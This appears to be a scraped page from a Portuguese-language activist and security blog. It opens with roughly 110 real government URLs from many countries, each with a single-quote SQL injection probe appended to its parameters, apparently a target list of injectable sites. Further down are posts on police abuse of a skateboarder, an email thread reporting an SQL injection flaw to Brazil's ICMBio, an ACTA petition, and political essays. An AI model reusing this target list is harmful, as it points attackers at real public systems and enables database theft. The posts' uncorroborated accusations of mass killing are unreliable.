http://xxxxxx.www.mscl.gov.mg/organisme/organes.php?id=1'
http://xxxxxx.ohridler.gov.mk/soo/details.php?id=15'&lang=en'
http://xxxxxx.www.macautourism.gov.mo/en/main/highlight.php?id=3'
http://xxxxxx.www.primature.gov.mr/fr/index.php?link=0'&id=1'
http://xxxxxx.www.tvet.gov.mv/newspage.php?id=2'
http://xxxxxx.www.educacion.yucatan.gob.mx/showpubli.php?id=1429'
http://xxxxxx.www.sefomec-coahuila.gob.mx/modulo10.php?id=45'
http://xxxxxx.culturacolima.gob.mx/cms/nota.php?id=1373'&autor=62'&cat=1'
http://xxxxxx.www.gobiernodigital.inah.gob.mx/mener/index.php?contentPagina=33'
http://xxxxxx.programas.jalisco.gob.mx/detallePrograma_hac.php?id=794'
http://xxxxxx.www.naucalpan.gob.mx/comunicado_completo_web.php?id=444'
http://xxxxxx.www.congresomich.gob.mx/index.php?id=271'
http://xxxxxx.portal.sre.gob.mx/chicago/popups/articleswindow.php?id=64'
http://xxxxxx.seia.guanajuato.gob.mx/panel/document/phpver.php?id=1147'
http://xxxxxx.www.mec.gov.mz/forum/forum_topico.php?id_cat=7'
http://xxxxxx.www.moe.gov.na/m_pro_projects.php?id=2'&projectid=3'
http://xxxxxx.www.jigawastate.gov.ng/contentpage.php?id=255'
http://xxxxxx.www.nass.gov.ng/nass/news.php?id=157'
http://xxxxxx.www.mem.gob.ni/index.php?s=1'&idp=174'&idt=2'&id=424'
http://xxxxxx.www.nta.gov.np/en/aboutus/index.php?id=7'
http://xxxxxx.bhaktapur.gov.np/newsdetail.php?id=157'
http://xxxxxx.www.ncasc.gov.np/news.php?id=21'
http://xxxxxx.www.dwss.gov.np/dwss-pictures.php?id=28'
http://xxxxxx.www.ird.gov.np/ird/index/document_display.php?id=18'
http://xxxxxx.www.nepalntp.gov.np/content.php?id=206'
http://xxxxxx.www.mof.gov.np/demo/en/newsroom/detail.php?id=52'
http://xxxxxx.proinvex.mici.gob.pa/index.php?option=com_content'&view=article'&id=100'&Itemid=62'&lang=en'
http://xxxxxx.www.sistemapenitenciario.gob.pa/nosotros.php?id=1'
http://xxxxxx.www.projoven.gob.pe/institucional.php?id=15'
http://xxxxxx.www.munimarcona.gob.pe/ver_notasprensa.php?id=69'
http://xxxxxx.www.inpe.gob.pe/contenidosprensa.php?id=905'&direccion=1'
http://xxxxxx.www.drtcp.gob.pe/view_deta.php?display=encuesta'&id='
http://xxxxxx.www.peru.gob.pe/transparencia/pep_transparencia_lista_planes.asp?id_entidad=13904'&id_tema=1'
http://xxxxxx.www.hospitalvitarte.gob.pe/cas.php?id=117'
http://xxxxxx.www.dole.gov.ph/list_of_holidays.php?id=95'
http://xxxxxx.archives.pia.gov.ph/wdavh2011/?m=3'&i=brazil'&sm=events'
http://xxxxxx.www.gjtmap.gov.pk/ngos/sb_bro_ngo.php?id=14'
http://xxxxxx.www.psf.gov.pk/staffdetail.php?id=10'
http://xxxxxx.multan.gov.pk/files.php?id=1'
http://xxxxxx.www.lhc.gov.pk/judges/jbiodata.php?id=132'
http://xxxxxx.profile.hec.gov.pk/?comp=registration.php'&return=des.hec.gov.pk'&param=CSEfsoNuNcdPScqen4RUk3/Y6zCjLwb6tb6XfCz9'
http://xxxxxx.www.multan.gov.pk/page.php?data=193'
http://xxxxxx.www.psf.gov.pk/abstract.php?id=5'
http://xxxxxx.www.ncsw.gov.pk/news-details.php?id=29'
http://xxxxxx.cnw.gob.pk/tenderview.php?id=19'
http://xxxxxx.www.sindhinformation.gos.pk/showpress_release.php?id=181'
http://xxxxxx.smart.ippt.gov.pl/index.php?id=research_conferences'
http://xxxxxx.fluid.ippt.gov.pl/ictam04/php/ext_www/abstract_view.php?id=1734'
http://xxxxxx.www.planonacionaldeleitura.gov.pt/clubedeleituras/download.php?s=elivros'&chave=T200en94'&id=200'
http://xxxxxx.www.seprelad.gov.py/contenido.php?id=21'
http://xxxxxx.www.sas.gov.py/xhtml/login/notisas.php?id=102'
http://xxxxxx.www.rosprom.gov.ru/snews.php?id=166'&vers=print'
http://xxxxxx.www.orinfor.gov.rw/printmedia/topstory.php?id=4258'
http://xxxxxx.tabukedu.gov.sa/ta31/send2.php?id=4605'
http://xxxxxx.www.parliament.gov.sd/en/presidents.php?id=1'
http://xxxxxx.www.pepam.gouv.sn/annuaire.php?id=95'&lang=fr'
http://xxxxxx.www.nombredejesus.gob.sv/pages/proyectos.php?id=50'
http://xxxxxx.www.sansalvador.gob.sv/comunicaciones/desc_comunicados.php?id=3'
http://xxxxxx.www.mahrukat.gov.sy/news.php?id=13'
http://xxxxxx.thailand.prd.go.th/view_around_thailand.php?id=6081'
http://xxxxxx.thainews.prd.go.th/en/news.php?id=255410140004'
http://xxxxxx.www.maerang.go.th/webboard_view.php?id=146'
http://xxxxxx.inter.mua.go.th/main2/news_detail.php?id=72'
http://xxxxxx.www.dmh.moph.go.th/news/view.asp?id=1008'
http://xxxxxx.www.ubon.go.th/dept/dtdetail.php?id=28971'
http://xxxxxx.www.sisaketedu1.go.th/nineboard/view.php?id=2877'
http://xxxxxx.www.nph.go.th/consult/nphboard/nphtopic.php?id=0000000046'
http://xxxxxx.www.oae.go.th/main.php?filename=index___EN'
http://xxxxxx.www.navy.mi.th/newwww/code/special/terminology/terminology.php?id=0'
http://xxxxxx.www.grandprix-tunis.gov.tn/en/index1.php?id=21'
http://xxxxxx.www.marchespublics.gov.tn/onmp/banniere/redirectb.php?id=810'&idb=78'&'
http://xxxxxx.www.finance.gov.tt/services.php?mid=10'
http://xxxxxx.www.tycc.gov.tw/mp_all.php?id=1'
http://xxxxxx.express.culture.gov.tw/events_detail.php?id=6761'
http://xxxxxx.tpeusar.tfd.gov.tw/inside_NewsList.php?id=71'
http://xxxxxx.tainan.cca.gov.tw/about_news_more.php?id=16'
http://xxxxxx.www.tcu.go.tz/info/news/view_news.php?id=56'
http://xxxxxx.www.marineparks.go.tz/parks_info.php?id=1'
http://xxxxxx.www.maji.go.tz/news_events/view_news_item.php?id=230'&intVariationID=1'&szTitle=Current'
http://xxxxxx.www.meac.go.tz/news_events/view_event.php?id=129'&intVariationID=1'&szTitle=Current'
http://xxxxxx.www.pmoralg.go.tz/news_events/view_news_item.php?id=385'&intVariationID=1'&szTitle=Current'
http://xxxxxx.www.vpo.go.tz/announcements/view_news_item.php?id=350'&intVariationID=1'
http://xxxxxx.www.meteo.go.tz/data.php?id=19'
http://xxxxxx.www.mem.go.tz/news_events/view_news_item.php?id=68'&intVariationID=1'&szTitle=Current'
http://xxxxxx.www.meteo.go.tz/news_events/view_event.php?id=326'
http://xxxxxx.www.tira.go.tz/news_events/view_news_item.php?id=56'
http://xxxxxx.www.zanzibarassembly.go.tz/news_events/view_event.php?id=755'&intVariationID=1'&szTitle=Current'
http://xxxxxx.www.mkurabita.go.tz/resource_centre/view_press.php?id=96'&chooselang=1'
http://xxxxxx.tender.ppra.go.tz/tender_details.php?id=4356'
http://xxxxxx.www.dabi.gov.ua/news_text.php?id=589'
http://xxxxxx.www.uaan.gov.ua/akademiki.php?id=112'
http://xxxxxx.dzz.gov.ua/CPOSI/style/page_2/templer_page2_en.php?id=2'&table=text_monitoring'
http://xxxxxx.www.unbs.go.ug/news.php?id=52'
http://xxxxxx.www.ugabif.go.ug/ncd/organisation_detail.php?id=41'
http://xxxxxx.hsc.go.ug/general/downloads.php?id=9'
http://xxxxxx.www.opm.go.ug/news.php?News_id=40'
http://xxxxxx.jlos.go.ug/page.php?p=curnews'&id=54'
http://xxxxxx.amuru.go.ug/districtprofile_category.php?id=18'
http://xxxxxx.www.mia.go.ug/pagex.php?p=news'&id=2'
http://xxxxxx.www.fonep.gob.ve/noticias.php?id=195'
http://xxxxxx.www.inzit.gob.ve/detalle_noticias.php?id=53'
http://xxxxxx.www.sisov.mpd.gob.ve/estudios/detalle.php?id=158'
http://xxxxxx.www.monteavila.gob.ve/mae/catalogo-resultado-detalle.php?id=225'
http://xxxxxx.www.fundayacucho.gob.ve/vistas/enterate.php?id=70'
http://xxxxxx.www.dpe.gov.za/home.php?id=581'
http://xxxxxx.www.mpuleg.gov.za/show.php?id=11'&menu=17'
Somente estudos.

quinta-feira, 26 de julho de 2012

Guarda Municipal (GM-Rio) prestando um desserviço

 Guarda Municipal (GM-Rio)  prestando um desserviço

Outra vez estão prestando um desserviço para a sociedade e tratando atletas como se fossem criminosos. Desta vez o guarda de nome Afonso argumentou que o skatista poderia se machucar ou machucar alguma outra pessoa que estava EM UMA PISTA DE SKATE, local este destinado a prática do esporte, que é considerado radical.
Mostrando muita destreza e preparo, para proteger a vida e o bem estar do skatista, o Guarda Afonso, sem titubear passou uma rasteira em Pedro Henrique Neném, quando o mesmo tentou dar um Ollie out, saindo do obstáculo. Imagino que essa “autoridade” deve ter pensado que jogando o skatista para o chão desta forma e na velocidade que ele estava, apenas quebraria um braço ou talvez a perna, protegendo-o de um tombo no qual, ele poderia sujar seu short, no máximo.
Reparem a altura que o atleta voou depois de ter levado um chute da “autoridade” Afonso.
Sem Título 1 640x352 Guarda Municipal agride skatista menor de idade
Esse fato aconteceu no SKATEPARK de Madureira, o que nos leva a crer, que as “autoridades” realmente veem o skate como algo banal, e até mesmo nos locais cedidos pela prefeitura, você não pode praticar o esporte sem ser agredido por policiais.
Confira o vídeo comprovando todos os fatos:
Mudando de assunto, mas sem sair do tema, isso me lembrou do dia 31 de Dezembro de 2011, quando eu e alguns amigos estávamos fazendo downhill speed na cidade de São Paulo, passando pelos trechos que estava interditados para a São Silvestre. Claro que fizemos isso horas antes de começar a corrida, porém, descendo a Brigadeiro Luis Antônio eu passei pela mesma situação que esse garoto enfrentou no vídeo, eu estava a uns 40 ou 50km/h quando um Policial Militar colocar o pé para parar meu skate e entrou na minha frente, óbvio que demos uma grande trombada forte. Ele tentou tomar meu longboard, mas é óbvio que eu não deixaria que isso acontecesse. Os outros policia presentes no local perceberam o erro e o abuso de “autoridade” do “amigo”, e separam a confusão, pedindo desculpas a mim e pedindo para irmos embora.
Esses são apenas alguns dos milhares de fatos que acontecem todos os dias envolvendo policias que abusam da sua farda, pois sem ela não seria nada, e skatistas que tem o esporte no sangue e lutam para serem grandes atletas.
Espero de coração que um dia o skate seja colocado nas Olimpíadas, para que, quem sabe, sejamos um pouco mais respeitados, aliás, é o nosso esporte que trás mais medalhas e títulos para o Brasil, não o futebol.
Visto a camisa do skate e farei o possível para ver a evolução do meu esporte favorito. Quero ver a mídia mostrando esses fatos, por isso insisto tanto em continuar postando esse tipo de barbárie. Quero ver as declarações dos secretários de segurança, de esporte, ministros. Se nem em ano de eleição eles puderem se justificar, podemos perder as esperanças de ter nosso esporte sendo respeitado.

quinta-feira, 5 de julho de 2012

Re: ICMBio - Instituto Chico Mendes de Conservação da Biodiversidade: Vulnerabilidade ativa

Re: ICMBio - Instituto Chico Mendes de Conservação da Biodiversidade: Vulnerabilidade ativa

Caso encerrado.
Resposta : 

Boa tarde,

O  grupo Google INURL - Brasil
Ficamos satisfeitos pelo retorno.
Não postamos as falhas em nosso blog, vamos postar sua resposta assim 
Dando credibilidade e importância ao ocorrido.

Muito obrigado & Boa noite.
Estamos de olho.

Atenciosamente Grupo Google INURL - Brasil

---- Original Message ----
From: Uilson Azevedo
To: "Google INURL - BRASIL"
Cc: "Carlos Roberto Lacerda Cunha" , "Renata Gomes" , "Mauro Felipe" , "ICMBio Instituto Chico Mendes de Conservação da Biodiversidade"
Sent: Qui, Jul 5, 2012, 16:58 PM
Subject: Re: ICMBio - Instituto Chico Mendes de Conservação da Biodiversidade: Vulnerabilidade ativa no site http://www4.icmbio.gov.br/

Senhores,


Agradecemos pela observação.

Os sites hospedados no domínio citado (www4.icmbio.gov.br) estão em processo de desativação pois são aplicações legadas e que poderiam mesmo ter vulnerabilidades.

Todas as medidas de segurança e isolamento do host foram tomadas antes de publicar os sites.

Qualquer dúvida estamos à disposição.

Uilson Azevedo
Conforme orientação do Coordenador de Tecnologia
ICMBio

Em 5 de julho de 2012 13:19, Ascom ICMBio <[email protected]> escreveu:
Carlos e Uilson,

chegou este email e achei pertinente que vces analisem, por se tratar da segurança do portal.

Sandra Tavares
9290

---------- Mensagem encaminhada ----------
De: Google INURL - BRASIL <[email protected]>
Data: 5 de julho de 2012 11:52
Assunto: ICMBio - Instituto Chico Mendes de Conservação da Biodiversidade: Vulnerabilidade ativa no site http://www4.icmbio.gov.br/
Para: [email protected]


Este é um e-mail de pedido de informações via http://www.icmbio.gov.br/portal/ de:
Google INURL - BRASIL <[email protected]>

Bom dia,
Venho informa que o site icmbio.gov.br
esta com uma vulnerabilidade SQL INJECTION que da acesso as tabelas usuários administrador do site.

Nível:Critico.

Vulnerabilidade ativa no site Site: www.icmbio.gov.br


Espero um retorno com correção da brecha.

Atenciosamente http://blog.inurl.com.br



--
Divisão de Comunicação Social - DCOM
Instituto Chico Mendes de Conservação da Biodiversidade - ICMBio
Ministério do Meio Ambiente - MMA
EQSW 103/104, Complexo Administrativo, Bloco B, Térreo, Setor Sudoeste, CEP 70.670-350, Brasília-DF
Tel.: (61) 3341-9280 begin_of_the_skype_highlighting            (61) 3341-9280      end_of_the_skype_highlighting a 3341-9294
www.icmbio.gov.br
[email protected]




--
Uilson Azevedo

CTI - Coordenação de Tecnologia
ICMBio - Instituto Chico Mendes de Biodiversidade
Fone: (61) 3341 9606 begin_of_the_skype_highlighting            (61) 3341 9606      end_of_the_skype_highlighting
Celular: (61) 9805 5512 begin_of_the_skype_highlighting            (61) 9805 5512      end_of_the_skype_highlighting

terça-feira, 31 de janeiro de 2012

Detenha a grande ameaça à liberdade da Internet

Detenha a grande ameaça à liberdade da Internet


Enquanto cidadãos preocupados, apelamos aos senhores e senhoras para que lutem por uma Internet livre e aberta, e rejeitem a ratificação do Acordo Comercial Anti-pirataria (ACTA). A Internet é uma ferramenta crucial para as pessoas ao redor do planeta trocarem ideias e promoverem a democracia. Insistimos que mostrem uma verdadeira liderança global e protejam nossos direitos.


Na semana passada, 3 milhões de nós contra-atacaram a investida dos Estados Unidos sobre nossa Internet! --- mas há uma ameaça ainda maior e nosso movimento global pela liberdade online está completamente decidido a acabar com essa ameaça de uma vez por todas.

ACTA - um acordo global - pode permitir que as corporações censurem a Internet. Negociado secretamente por um pequeno número de países ricos e por poderes corporativos, esse acordo configuraria um novo órgão sombrio para a regulamentação comercial internacional que daria poder para interesses privados policiarem tudo que fazemos online e iria impor enormes penalidades -- inclusive sentença à prisão -- a pessoas que eles julgarem estar afetando seus negócios.

Nesse exato momento, a Europa está decidindo se ratificará ou não o ACTA -- e sem ela, o ataque global à liberdade na Internet vai desmoronar. Nós sabemos que a Europa se opôs ao ACTA anteriormente, mas alguns membros do Parlamento Europeu estão hesitando -- vamos dar o empurrão que eles precisam para rejeitar o tratado. Assine a petição à direita -- faremos uma entrega espetacular em Bruxelas quando alcançarmos 500.000 assinaturas.

É revoltante -- os governos de quatro quintos da população mundial foram excluídos das negociações do Acordo Comercial Antipirataria (ACTA) e burocratas não eleitos têm trabalhado de perto com lobistas corporativos para criar novas regras e um regime de aplicação dessas regras altamente perigoso. O ACTA cobriria inicialmente os EUA, Europa e 9 outros países, e então se expandiria para o mundo. Mas se conseguirmos que a União Europeia diga não agora, o tratado perderá sua força e poderá ser paralisado para sempre.

As regras bastante rigorosas significam que pessoas em qualquer lugar do mundo são punidas por atos simples como compartilhar um artigo de jornal ou enviar um vídeo de uma festa que possua uma música sob direitos autorais. Vendido como sendo um acordo comercial para proteger os direitos autorais, o ACTA pode também banir medicamentos genéricos que salvam vidas e ameaçar o acesso de fazendeiros locais a sementes que eles precisam. E, espantosamente, o comitê do ACTA vai ter carta-branca para mudar suas próprias regras e sanções sem controle democrático.

O interesse das grandes corporações está pressionando muito pela aprovação do ACTA, mas o Parlamento Europeu está no meio do caminho. Vamos enviar um apelo enorme aos parlamentares para ignorarem o lobby e se posicionarem a favor da liberdade da Internet. Assine à direita e envie para todos que você conhece.

Na semana passada, vimos a dimensão do poder da coletividade quando milhões de nós juntaram forças para impedir que os EUA aprovassem leis de censura da Internet que atingiriam a rede em cheio. Nós também mostramos ao mundo o quão poderosas nossas vozes podem ser. Vamos levantar nossas vozes mais uma vez para combater essa nova ameaça.


FAÇA SUA PARTE ASSINANDO DIGITALMENTE NESTE LINK : http://www.avaaz.org/po/eu_save_the_internet_spread/?frScybb&pv=274

segunda-feira, 30 de janeiro de 2012

Vídeo de quem esteve em Pinheirinho traz várias testemunhas de ocultação de corpos


Não se deixem levar pelo título forte. É figura retórica, provocação desesperada de quem viu o horror de perto. E é importante que assistam até o final. Segue a descrição do trabalho, porPedro Rios Leão, que o filmou:
“Filme denúncia sobre o massacre de Pinheirinho
O Governador do estado de São Paulo, o Prefeito de São José dos campos, O Tribunal de Justiça de São Paulo, Toda a força policial, tanto da PM paulistana presente, quanto da Guarda Municipal, a direção inteira do hospital municipal de são josé, a mídia, em particular a Rede Globo, que escancaradamente foi o veículo oficial do Governo Paulista, TODO O CORPO JURÍDICO ENVOLVIDO NA REINTEGRAÇÃO DE POSSE, incluindo o ministro César Peluso, o Ministro Gilberto Carvalho,o ministro Eduardo Cardozo, todos, TODOS agindo a mando de Naji Nahas. A lista de assassinos de Pinheirinho não tem fim. Parem de procurar apenas UM culpado! REVOLTE-SE. Exija a justiça que nos é negada todo dia! Pelo fim do domínio dos banqueiros. Juntos nós podemos.”
Nota do QTMD?: Este site publica este vídeo como forma de pressionar para que o que aconteceu em Pinheirinho, no domingo, 22 de Janeiro de 2012, e que a própria presidenta já definiu como “barbárie”, seja investigado e que, se houve mesmo mortes, os corpos apareçam e que as famílias não fiquem anos esperando como as da época da ditadura militar. A editora deste site quer acreditar que vive num país que não tem medo da democracia. Sendo verdade que o governo paulista quebrou o pacto federativo para promover uma chacina, que seja punido. E que episódios como esse nunca mais se repitam. Aos que acharem o vídeo duro, peço que se imaginem no lugar do Pedro, colocando a própria vida em risco.

fonte:http://quemtemmedodademocracia.com/2012/01/27/video-de-16-minutos-filmado-por-quem-esteve-em-pinheirinho-varias-testemunhas-de-ocultacao-de-corpos/

sábado, 28 de janeiro de 2012

Como a mídia brasileira sufoca a liberdade de expressão


Esse vídeo so é um poco antigo, mas fora isso é excelente para explicar o real motivo de nossa midia nunca contestar nada, nunca cobrar nada e apenas fazer o eterno papel ainda de querer nos manipular.


Vídeo fundamental para entender de uma vez por todas como a oligarquia midiática destrói um dos nossos direitos fundamentais, que é o direito à comunicação. 
Didático, a matéria mostra que a concentração dos grandes veículos de comunicação na mão de poucas famílias beira a monarquia, já que o poder é transmitido de pai para filho. 

Em pleno século XXI, é vergonhoso para o Brasil que a pornográfica distribuição de concessões de rádios e TVs feitas por (e para) políticos e empresários picaretas no século passado ainda renda esse atraso monstruoso da mídia que, a despeito da sua milionária estrutura física e técnica, faz jorrar todos os dias uma programação de péssima qualidade para os brasileiros. E quando alguém ousa "competir" com esse poder midiático (montando, por exemplo, uma rádio comunitária), eis que todo o poder constituído se une (oligarcas da mídia, políticos, governos, ANATEL, polícia, Justiça etc.) para confiscar, prender, multar e processar aquele que cometeu o crime de tentar - como faz a poderosa mídia - se comunicar de forma eficaz com os seus iguais. 

E como mudar tal estrutura se a maioria dos políticos e empresários tem interesse direto ou indireto em deixar tudo do jeito que está? Digo "direto" porque muitos políticos são privilegiados donos de rádios e TVs - e foi exatamente por causa disto que conseguiram se eleger; e digo "indireto" porque a outra parcela de políticos (os que não são donos de veículos de comunicação), certamente recebem apoio daqueles que detém o "poder midiático". 

Este vídeo foi postado originalmente com o nome "Levante a Sua Voz". Eis o crédito do mesmo:

Vídeo produzido pelo Intervozes Coletivo Brasil de Comunicação Social com o apoio da Fundação Friedrich Ebert Stiftung remonta o curta ILHA DAS FLORES de Jorge Furtado com a temática do direito à comunicação. A obra faz um retrato da concentração dos meios de comunicação existente no Brasil.

Roteiro, direção e edição: Pedro Ekman
Produção executiva e produção de elenco: Daniele Ricieri
Direção de Fotografia e câmera: Thomas Miguez
Direção de Arte: Anna Luiza Marques
Produção de Locação: Diogo Moyses
Produção de Arte: Bia Barbosa
Pesquisa de imagens: Miriam Duenhas
Pesquisa de vídeos: Natália Rodrigues
Animações: Pedro Ekman
Voz: José Rubens Chachá

sexta-feira, 27 de janeiro de 2012

Povo assim, os corruptos adoram

Povo assim, os corruptos adoram

Dois episódios no Orkut me inspiraram a escrever esse texto. Mesmo que não estejam diretamente ligados ao assunto deste tópico, me ajudaram a pensar a respeito.

Um é a polêmica dos busólogos que passaram a defender a padronização visual dos ônibus do RJ e os problemas que vieram junto (que os mesmos ainda insistem em dizer que não existem).

Outro é um tópico da comunidade "Eu odeio a seleção brasileira", que define como idiota quem torce pela seleção da Argentina. Apesar de não gostar de futebol e de reprovar de uma certa forma o fanatismo do futebol argentino, se percebermos bem, o fanatismo deles não é tão alienado como o nosso, pois além do futebol ser tratado como mero esporte - aqui o futebol tem uma importância exagerada para as características que possui - , o povo de lá se rebela contra os abusos das autoridades. Aqui, chegam a beijar os pés de algum político abusado.

O brasileiro é tradicionalmente um povo medroso e submisso. O povo bravo do Hino Nacional, que "não foge a luta" existe só na letra. Na verdade o povo brasileiro até se sente confortável com o cenário atual, com paliativos disfarçados de "soluções definitivas" e deslumbrado com o crescimento da indústria do entretenimento no país. Viramos a potência da diversão mundial e isso parece satisfazer a população.

Já em qualidade de vida, ainda estamos entre os piores. Basta colocar os problemas debaixo do tapete ou tentar "resolvê-lo" com paliativos como bolsas disto e daquilo ou esmolões como o "Criança Esperança". Resolver de maneira concreta os problemas exige esforço e risco e a população não está preocupada em enfrentá-los para uma melhoria definitiva. Se não dá para resolver um problema, o jeito é fugir para as drogas licitas ou não ou para a farra das noitadas e do futebol. Fuga, fuga, fuga, essa é a ordem.

E isso agrada muito a autoridades e grandes empresários. Desde os anos noventa, esse aspecto tem ajudado a atrair a atenção de vários grandes empresários estrangeiros. Um deles, que obviamente não se identificou, foi enfático: "quero investir no país porque o povo daqui é obediente e a mão de obra é barata". É o preço que o povo tem que pagar por ser tão alienado e conformista.

E as autoridades, sobretudo as corruptas, se beneficiam desse cenário, pois ficam livres da ameaça de revolta popular. A população se limita a reclamar pelas costas, mas aquela "reclamação" que já é permitida pela grande mídia, muitas vezes não levada a sério pelos alvos dessa reclamação e incapaz de romper a "impermeabilidade" desse políticos, que permanecem impunes.

Infelizmente, não tenho orgulho de viver nesse país. Parece que para muitos, os problemas existentes já fazem parte de nossa nação. Como se integrassem o nosso folclore. E isso contribuí ainda mais para que eles permaneçam.

Mas não faz mal. Se a situação se complicar, vai todo mundo correndo se esconder em um estádio de futebol ou em alguma boate e se alucinar com alguma cerveja. Até que o velho problema não resolvido volte para lembrar os brasileiros de que ainda continua vivo, sadio e atuante.